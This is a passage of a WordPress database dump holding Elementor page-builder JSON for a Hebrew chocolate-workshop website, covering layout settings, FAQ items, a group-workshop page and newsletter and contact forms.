\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"6d2d5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5a71e36\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"156941b9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"352cdf5b\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(492,114,'_elementor_version','0.4'),(494,115,'_elementor_template_type','section'),(495,115,'_elementor_edit_mode','builder'),(496,116,'_elementor_template_type','page'),(497,116,'_elementor_edit_mode','builder'),(498,115,'_wp_page_template','default'),(499,115,'_elementor_data','[{\"id\":\"5acecf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"3ce72ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"55c9916\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e9a451\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"e628903\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00f8f5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(500,117,'_elementor_template_type','page'),(501,117,'_elementor_edit_mode','builder'),(502,117,'_wp_page_template','default'),(503,117,'_elementor_data','[{\"id\":\"5acecf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"3ce72ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"55c9916\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e9a451\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"e628903\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00f8f5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(504,115,'_elementor_version','0.4'),(505,118,'_wp_page_template','elementor_canvas'),(506,118,'_elementor_edit_mode','builder'),(507,118,'_elementor_data','[{\"id\":\"5841dc66\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"4504fb06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"b815b78\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"76b85204\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"4855771b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"23c8927c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd \\u05d5\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"cs